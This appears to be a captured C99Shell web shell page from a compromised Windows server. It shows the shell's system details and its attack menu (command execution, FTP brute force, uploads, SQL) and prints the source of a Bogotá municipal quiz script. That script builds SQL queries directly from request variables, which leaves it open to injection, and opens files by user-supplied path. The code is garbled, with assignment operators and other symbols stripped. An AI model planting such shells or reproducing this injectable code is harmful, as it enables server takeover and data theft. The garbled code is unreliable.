!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     anseval.php (8.37 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
$erick 
0;
$jodido = isset($pass);
if (
$jodido == true) {

$db "sia";
@
$c1 OciLogon($user,$pass,$db);
if (!
$c1)
{
   echo 
"Connection failed (Fallo Conexion)<br>";
   echo 
"Por favor verifique su clave o nombre de usuario";
   exit;
}else{
include(
'conect/conect.php');

$consul1 "SELECT *
FROM resultados
WHERE codeval='
$codigoeval' and usuario='$user'";
$result1 mysql_query($consul1,$db);
$num_filas mysql_num_rows($result1);
$myrow1 mysql_fetch_array($result1);

if (
$num_filas == 0) {

$erick 2;
}else{
echo 
"Evaluación ya añadida<br>";
   echo 
"Por favor verifique que usted ya no la haya aplicado";
   exit;

}
}
}


// Extractar la hora y calcular con el tiempo dado a que horas debe acabar.

include('help/hoy.php');

$fal $tiempodado $mi;
if (
$fal >= 60) {
$fal $fal 60;
$mi $fal;
$hr $hr 1;
}else{
$mi $tiempodado $mi;
}

if (
$mi 10) {
$mi "0" $mi;
}


$ni $hr 100;
$timilin $ni $mi;


include(
'conect/conect.php');

if (
$erick == 2) {
$query ="INSERT INTO resultados VALUES('$user','$codigoeval','','','User DAMA','$timilin','')";
$result mysql_query($query,$db);
}
?>

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Departamento T&eacute;cnico Administrativo del Medio Ambiente, DAMA</title>
<script language="javascript">
<!--
var Temp;
var TimerId = null;
var TimerRunning = false;
Seconds = 0;
Minutes = 0;
Hours = 0;

function showtime() {
if (Seconds >= 59)
{
Seconds = 0
if (Minutes >= 59)
{
Minutes = 0
if (Hours >= 23)
{
Seconds = 0
Minutes = 0
Hours = 0
}
else {
++Hours
}
}
else {
++Minutes
}
}
else {
++Seconds
}

if (Seconds != 1) {var ss="s"} else {var ss=""}
if (Minutes != 1) {var ms="s"} else {var ms=""}
if (Hours != 1) {var hs="s"} else {var hs=""}

Temp = 'Usted ha tomado '+Minutes+' minuto'+ms+', '+Seconds+' segundo'+ss+''
window.status = Temp;
document.form1.reloj.value = Temp;
TimerId = setTimeout("showtime()", 1000);
TimerRunning = true;
}

function stopClock() {
if (TimerRunning)
clearTimeout(TimerId);
TimerRunning = false;
}
function startClock() {
stopClock();
showtime();
}

function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}



//-->
</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body onload="startClock()" topmargin="0" bgcolor="#FFFFFF">

<table border="0" cellpadding="6" width="100%">
  <tr>
    <td width="33%"></td>
    <td width="33%">
      <table border="0" cellpadding="0" width="800" cellspacing="0">
        <tr> 
          <td width="100%">&nbsp;</td>
        </tr>
      </table>
    </td>
    <td width="33%"></td>
  </tr>
  <tr>
    <td width="33%"></td>
    <td width="33%"> <p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><b>Nota:</b> 
        <font color="#FF0000" ><b> Ciudadano</b></font>, usted tiene <font color="#FF0000"><b><?php echo $tiempodado?></b></font> 
        minutos, para contestar esta evaluaci&oacute;n. Una vez se pase el tiempo 
        su evaluaci&oacute;n ser&aacute; recibida, pero tendr&aacute; una indicaci&oacute;n 
        de que no se ha cumplido con el tiempo, tan s&oacute;lo con el fin de 
        controlar estad&iacute;sticamente los resultados. As&iacute; que adem&aacute;s 
        de las respuestas correctas, es importante enviar a tiempo. <font face="Verdana, Arial, Helvetica, sans-serif" size="2"><b><br>
        <br>
        Nota para usuarios registrados:</b></font> <font color="#CC0000"><strong><br>
        Si usted cierra esta ventana, y vuelve a esta evaluación, se considerar&aacute; 
        como ya aplicada.</strong></font></font></p>
      <p align="center"><strong><font face="Verdana, Arial, Helvetica, sans-serif" size="3">Por 
        ser esta una forma de evaluaci&oacute;n <font color="#FF0000">NO</font> 
        formal, no representa sino un car&aacute;cter m&aacute;s que todo estad&iacute;stico, 
        pues no compromete datos personales, ni calificaci&oacute;n real alguna.</font></strong></p>
      <center><table width="650" border="0" cellspacing="0" cellpadding="25">
        <tr>
          <td>
            <p><font face="Verdana, Arial, Helvetica, sans-serif" size="5"><b><?php echo $nombre1?></b></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
                <img src="fblanco.gif" width="15" height="18"> <b>Descripci&oacute;n:</b> 
                <?php echo $descripcion?><br>
              </p>
            <center><table width="600" border="1" cellspacing="0" cellpadding="10" bordercolor="#CCCCCC" bgcolor="#ECFCFF">
              <tr>
                <td>

<form name="form1" method="post" action="reqevaluate.php">
<font face="Verdana, Arial, Helvetica, sans-serif" size="2">Contador de Tiempo
  de Evaluaci&oacute;n
  <input type="text" name="reloj" size="50">
  </font>
<?php
$re 
0;
$p 0;
$textodoc "C:\\siteadmon\\docs\\" $textodoc;
define('nombre_fichero'$textodoc);
$ficha fopen(nombre_fichero'r');
$num_linea 0;
while (!
feof($ficha))
{
$num_linea++;
$buffer fgets($ficha4096);

// Una vez leida la linea, se explota y se asigna a cada cosa un valor.

$string explode("/"$buffer);
$le count($string);


// Si es un campo de pregunta, no sale sino la pregunta y un campo oculto con el valor general.


if ($le == 2) {
echo 
"<input type=\"hidden\" name=\"p$num_linea\" value=\"$buffer\">
<p> <font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\"><b><img src=\"../images/icono/pred.gif\" width=\"7\" height=\"7\"> 
$string[1]
    </font></p>\n"
;
$preg $string[0];
echo 
"</b>\n";
}


// Si es un campo de respuesta, se muestra la respuesta en texto y la opcion de escoger o no.

/////////////////////////////////////////////////////////////////
//
// Ojo aqui hay que revisar si name=\"$r['$re']\" es valido o no
//
//
/////////////////////////////////////////////////////////////////

if ($le == 3) {
echo 
"<p> <font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\"><img src=\"../images/icono/po.gif\" width=\"3\" height=\"4\"> $string[1]
<input type=\"radio\" name=\"r[
$preg]\" value=\"$string[0]\">
    </font> </p>\n"
;
$re++;
}
}
fclose($ficha);

if (
$res == 1) {
echo 
"<input type=\"hidden\" name=\"user\" value=\"$user\">
<input type=\"hidden\" name=\"mailus\" value=\"Usuario: 
$user\">\n";
}

echo 
"<input type=\"hidden\" name=\"nombre1\" value=\"$nombre1\">
<input type=\"hidden\" name=\"descripcion\" value=\"
$descripcion\">
<input type=\"hidden\" name=\"tiempodado\" value=\"
$tiempodado\">
<input type=\"hidden\" name=\"textodoc\" value=\"
$textodoc\">
<input type=\"hidden\" name=\"fechaend\" value=\"
$fechaend\">
<input type=\"hidden\" name=\"codigoeval\" value=\"
$codigoeval\">
<input type=\"hidden\" name=\"re\" value=\"
$re\">
<input type=\"hidden\" name=\"res\" value=\"
$res\">
<input type=\"hidden\" name=\"hr\" value=\"
$hr\">
<input type=\"hidden\" name=\"mi\" value=\"
$mi\">
<input type=\"hidden\" name=\"timilin\" value=\"
$timilin\">
  </font>\n"
;


?>
------------------------------------------------------------------------------
<?php if ($res == 0) { ?> 
<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Importante</strong></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif">: 
<font size="1">Si usted es un usuario registrado, por favor agrege su nombre y 
correo electr&oacute;nico con el fin de acumular sus resultados.</font><br>
<strong>Nombre</strong>: 
<input type="text" name="user">
<strong>Mail</strong>: 
<input type="text" name="mailus">
</font> 
<p>
<?php ?>
    <center><input type="submit" name="Enviar" value="Enviar mi evaluación para calificación"></center>
  </p>



                </td>
              </tr>
            </table></center>

          </td>
        </tr>
      </table></center>
      <p align="center"><font
            face="Verdana"><strong> <small><small><font size="1">Departamento 
        T&eacute;cnico Administrativo del Medio Ambiente, DAMA</font></small></small></strong><font size="1"><small><small><br>
        <a href="http://www.alcaldiabogota.gov.co">Alcaldía Mayor de Bogotá</a><br>
        Todos los Derechos Reservados<br>
        1999 - 2004</small></small></font></font></p>
      </td>
    <td width="33%"></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--